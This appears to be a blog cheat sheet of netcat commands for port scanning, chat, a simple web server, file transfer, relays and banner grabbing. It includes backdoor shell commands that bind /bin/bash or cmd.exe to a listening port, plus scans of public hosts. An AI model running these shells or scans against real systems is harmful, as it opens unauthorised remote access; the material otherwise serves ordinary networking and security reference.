tags: - netcat categories: - informational comments: true

date: 2021-09-05 00:00:00

port scanning

A basic port scan command for an IP ncat address looks like this:

nc -v -n 8.8.8.8 1-1000

nc -v google.com 1-1000

chat or web Server

nc -l -p 1299

netcat command screenshot of the chat command

Then all you need to do is launch the chat session with a new TCP connection:

nc localhost 1299

basic web server

printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8999

w3m http://localhost:8999

HTTP requests with netcat

printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80

TCP server and TCP client

Run this Netcat command on the server instance to send the file over port 1499:

nc -l 1499 > filename.out

run this command on the client to accept, receive, and close the connection:

nc server.com 1499 < filename.in

launching reverse (backdoor) shell

nc -n -v -l -p 5555 -e /bin/bash

from any other system on the network, you can test how to run commands on host after successful Netcat connection in bash.

nc -nv 127.0.0.1 5555

netcat fundamentals - command flags

nc -4 – use IPv4 only
nc -6 – use IPv6
nc -u – use UDP instead of TCP
nc -k -l – continue listening after disconnection
nc -n – skip DNS lookups
nc -v – provide verbose output

netcat relays on linux

nc -l -p [port] 0 (less than) backpipe (pipe) nc [client IP] [port] (pipe) tee
backpipe

netcat banners

echo "" | nc -zv -wl [host] [port range] – obtain the TCP banners for a range of ports

netcat backdoor shells

nc -l -p [port] -e /bin/bash – run a shell on Linux
nc -l -p [port] -e cmd.exe – run a shell on Netcat for Windows

Credits

JEFF PETTERS Jeff has been working on computers since his Dad brought home an IBM PC 8086 with dual disk drives. Researching and writing about data security is his dream job.

https://www.varonis.com/blog/author/jpetters/